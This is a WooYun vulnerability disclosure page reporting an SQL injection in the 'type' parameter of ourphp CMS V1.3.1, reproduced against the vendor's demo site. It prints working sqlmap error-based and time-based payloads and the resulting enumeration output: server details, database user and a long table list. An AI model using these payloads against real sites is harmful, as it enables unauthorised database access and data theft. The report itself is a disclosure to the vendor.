当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135239

漏洞标题:ourphp最新版sql注入漏洞(可出任意数据)

相关厂商:ourphp.net

漏洞作者: 路人甲

提交时间:2015-08-19 11:05

修复时间:2015-10-03 11:24

公开时间:2015-10-03 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

rt

详细说明:

最新版本:V1.3.1
更新日期:2015-07-27
就拿官网demo复现。
http://demo.ourphp.net/?cn-product-23.html=&type=a
发现type参数有问题。

漏洞证明:

20150819104153.png


---
Parameter: type (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cn-product-23.html=&type=a AND (SELECT 6513 FROM(SELECT COUNT(*),CONCAT(0x716b787871,(SELECT (ELT(6513=6513,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cn-product-23.html=&type=a AND (SELECT * FROM (SELECT(SLEEP(5)))RWCY)
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
current user: 'ourphp@localhost'
current user is DBA: False
available databases [2]:
[*] information_schema
[*] ourphp
Database: ourphp
[343 tables]
+----------------------------------+
| dz_baidusubmit_setting |
| dz_baidusubmit_sitemap |
| dz_baidusubmit_urlstat |
| dz_common_admincp_cmenu |
| dz_common_admincp_group |
| dz_common_admincp_member |
| dz_common_admincp_perm |
| dz_common_admincp_session |
| dz_common_admingroup |
| dz_common_adminnote |
| dz_common_advertisement |
| dz_common_advertisement_custom |
| dz_common_banned |
| dz_common_block |
| dz_common_block_favorite |
| dz_common_block_item |
| dz_common_block_item_data |
| dz_common_block_permission |
| dz_common_block_pic |
| dz_common_block_style |
| dz_common_block_xml |
| dz_common_cache |
| dz_common_card |
| dz_common_card_log |
| dz_common_card_type |
| dz_common_connect_guest |
| dz_common_credit_log |
| dz_common_credit_log_field |
| dz_common_credit_rule |
| dz_common_credit_rule_log |
| dz_common_credit_rule_log_field |
| dz_common_cron |
| dz_common_devicetoken |
| dz_common_district |
| dz_common_diy_data |
| dz_common_domain |
| dz_common_failedip |
| dz_common_failedlogin |
| dz_common_friendlink |
| dz_common_grouppm |
| dz_common_invite |
| dz_common_magic |
| dz_common_magiclog |
| dz_common_mailcron |
| dz_common_mailqueue |
| dz_common_member |
| dz_common_member_action_log |
| dz_common_member_connect |
| dz_common_member_count |
| dz_common_member_crime |
| dz_common_member_field_forum |
| dz_common_member_field_home |
| dz_common_member_forum_buylog |
| dz_common_member_grouppm |
| dz_common_member_log |
| dz_common_member_magic |
| dz_common_member_medal |
| dz_common_member_newprompt |
| dz_common_member_profile |
| dz_common_member_profile_setting |
| dz_common_member_security |
| dz_common_member_secwhite |
| dz_common_member_stat_field |
| dz_common_member_status |
| dz_common_member_validate |
| dz_common_member_verify |
| dz_common_member_verify_info |
| dz_common_member_wechat |
| dz_common_member_wechatmp |
| dz_common_myapp |
| dz_common_myinvite |
| dz_common_mytask |
| dz_common_nav |
| dz_common_onlinetime |
| dz_common_optimizer |
| dz_common_patch |
| dz_common_plugin |
| dz_common_pluginvar |
| dz_common_process |
| dz_common_regip |
| dz_common_relatedlink |
| dz_common_remote_port |
| dz_common_report |
| dz_common_searchindex |
| dz_common_seccheck |
| dz_common_secquestion |
| dz_common_session |
| dz_common_setting |
| dz_common_smiley |
| dz_common_sphinxcounter |
| dz_common_stat |
| dz_common_statuser |
| dz_common_style |
| dz_common_stylevar |
| dz_common_syscache |
| dz_common_tag |
| dz_common_tagitem |
| dz_common_task |
| dz_common_taskvar |
| dz_common_template |
| dz_common_template_block |
| dz_common_template_permission |
| dz_common_uin_black |
| dz_common_usergroup |
| dz_common_usergroup_field |
| dz_common_visit |
| dz_common_word |
| dz_common_word_type |
| dz_connect_disktask |
| dz_connect_feedlog |
| dz_connect_memberbindlog |
| dz_connect_postfeedlog |
| dz_connect_tthreadlog |
| dz_forum_access |
| dz_forum_activity |
| dz_forum_activityapply |
| dz_forum_announcement |
| dz_forum_attachment |
| dz_forum_attachment_0 |
| dz_forum_attachment_1 |
| dz_forum_attachment_2 |
| dz_forum_attachment_3 |
| dz_forum_attachment_4 |
| dz_forum_attachment_5 |
| dz_forum_attachment_6 |
| dz_forum_attachment_7 |
| dz_forum_attachment_8 |
| dz_forum_attachment_9 |
| dz_forum_attachment_exif |
| dz_forum_attachment_unused |
| dz_forum_attachtype |
| dz_forum_bbcode |
| dz_forum_collection |
| dz_forum_collectioncomment |
| dz_forum_collectionfollow |
| dz_forum_collectioninvite |
| dz_forum_collectionrelated |
| dz_forum_collectionteamworker |
| dz_forum_collectionthread |
| dz_forum_creditslog |
| dz_forum_debate |
| dz_forum_debatepost |
| dz_forum_faq |
| dz_forum_filter_post |
| dz_forum_forum |
| dz_forum_forum_threadtable |
| dz_forum_forumfield |
| dz_forum_forumrecommend |
| dz_forum_groupcreditslog |
| dz_forum_groupfield |
| dz_forum_groupinvite |
| dz_forum_grouplevel |
| dz_forum_groupuser |
| dz_forum_hotreply_member |
| dz_forum_hotreply_number |
| dz_forum_imagetype |
| dz_forum_medal |
| dz_forum_medallog |
| dz_forum_memberrecommend |
| dz_forum_moderator |
| dz_forum_modwork |
| dz_forum_newthread |
| dz_forum_onlinelist |
| dz_forum_optionvalue1 |
| dz_forum_order |
| dz_forum_poll |
| dz_forum_polloption |
| dz_forum_polloption_image |
| dz_forum_pollvoter |
| dz_forum_post |
| dz_forum_post_location |
| dz_forum_post_moderate |
| dz_forum_post_tableid |
| dz_forum_postcache |
| dz_forum_postcomment |
| dz_forum_postlog |
| dz_forum_poststick |
| dz_forum_promotion |
| dz_forum_ratelog |
| dz_forum_relatedthread |
| dz_forum_replycredit |
| dz_forum_rsscache |
| dz_forum_sofa |
| dz_forum_spacecache |
| dz_forum_statlog |
| dz_forum_thread |
| dz_forum_thread_moderate |
| dz_forum_threadaddviews |
| dz_forum_threadcalendar |
| dz_forum_threadclass |
| dz_forum_threadclosed |
| dz_forum_threaddisablepos |
| dz_forum_threadhidelog |
| dz_forum_threadhot |
| dz_forum_threadimage |
| dz_forum_threadlog |
| dz_forum_threadmod |
| dz_forum_threadpartake |
| dz_forum_threadpreview |
| dz_forum_threadprofile |
| dz_forum_threadprofile_group |
| dz_forum_threadrush |
| dz_forum_threadtype |
| dz_forum_trade |
| dz_forum_tradecomment |
| dz_forum_tradelog |
| dz_forum_typeoption |
| dz_forum_typeoptionvar |
| dz_forum_typevar |
| dz_forum_warning |
| dz_home_album |
| dz_home_album_category |
| dz_home_appcreditlog |
| dz_home_blacklist |
| dz_home_blog |
| dz_home_blog_category |
| dz_home_blog_moderate |
| dz_home_blogfield |
| dz_home_class |
| dz_home_click |
| dz_home_clickuser |
| dz_home_comment |
| dz_home_comment_moderate |
| dz_home_docomment |
| dz_home_doing |
| dz_home_doing_moderate |
| dz_home_favorite |
| dz_home_feed |
| dz_home_feed_app |
| dz_home_follow |
| dz_home_follow_feed |
| dz_home_follow_feed_archiver |
| dz_home_friend |
| dz_home_friend_request |
| dz_home_friendlog |
| dz_home_notification |
| dz_home_pic |
| dz_home_pic_moderate |
| dz_home_picfield |
| dz_home_poke |
| dz_home_pokearchive |
| dz_home_share |
| dz_home_share_moderate |
| dz_home_show |
| dz_home_specialuser |
| dz_home_userapp |
| dz_home_userappfield |
| dz_home_visitor |
| dz_mobile_setting |
| dz_mobile_wechat_authcode |
| dz_mobile_wechat_masssend |
| dz_mobile_wechat_resource |
| dz_mobile_wsq_threadlist |
| dz_portal_article_content |
| dz_portal_article_count |
| dz_portal_article_moderate |
| dz_portal_article_related |
| dz_portal_article_title |
| dz_portal_article_trash |
| dz_portal_attachment |
| dz_portal_category |
| dz_portal_category_permission |
| dz_portal_comment |
| dz_portal_comment_moderate |
| dz_portal_rsscache |
| dz_portal_topic |
| dz_portal_topic_pic |
| dz_security_evilpost |
| dz_security_eviluser |
| dz_security_failedlog |
| dz_ucenter_admins |
| dz_ucenter_applications |
| dz_ucenter_badwords |
| dz_ucenter_domains |
| dz_ucenter_failedlogins |
| dz_ucenter_feeds |
| dz_ucenter_friends |
| dz_ucenter_mailqueue |
| dz_ucenter_memberfields |
| dz_ucenter_members |
| dz_ucenter_mergemembers |
| dz_ucenter_newpm |
| dz_ucenter_notelist |
| dz_ucenter_pm_indexes |
| dz_ucenter_pm_lists |
| dz_ucenter_pm_members |
| dz_ucenter_pm_messages_0 |
| dz_ucenter_pm_messages_1 |
| dz_ucenter_pm_messages_2 |
| dz_ucenter_pm_messages_3 |
| dz_ucenter_pm_messages_4 |
| dz_ucenter_pm_messages_5 |
| dz_ucenter_pm_messages_6 |
| dz_ucenter_pm_messages_7 |
| dz_ucenter_pm_messages_8 |
| dz_ucenter_pm_messages_9 |
| dz_ucenter_protectedmembers |
| dz_ucenter_settings |
| dz_ucenter_sqlcache |
| dz_ucenter_tags |
| dz_ucenter_vars |
| opcms_user |
| opcms_web |
| ourphp_ad |
| ourphp_admin |
| ourphp_adminclick |
| ourphp_api |
| ourphp_article |
| ourphp_banner |
| ourphp_book |
| ourphp_booksection |
| ourphp_column |
| ourphp_comment |
| ourphp_down |
| ourphp_freight |
| ourphp_integral |
| ourphp_job |
| ourphp_lang |
| ourphp_link |
| ourphp_mail |
| ourphp_orders |
| ourphp_photo |
| ourphp_plus |
| ourphp_product |
| ourphp_productattribute |
| ourphp_productcp |
| ourphp_productset |
| ourphp_productspecifications |
| ourphp_qq |
| ourphp_search |
| ourphp_shoppingcart |
| ourphp_temp |
| ourphp_user |
| ourphp_usercontrol |
| ourphp_userleve |
| ourphp_usermessage |
| ourphp_userpay |
| ourphp_userproblem |
| ourphp_video |
| ourphp_wap |
| ourphp_watermark |
| ourphp_web |
| ourphp_webdeploy |
+----------------------------------+

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-19 11:22

厂商回复:

谢谢 尽快修复

最新状态:

暂无


漏洞评价:

评论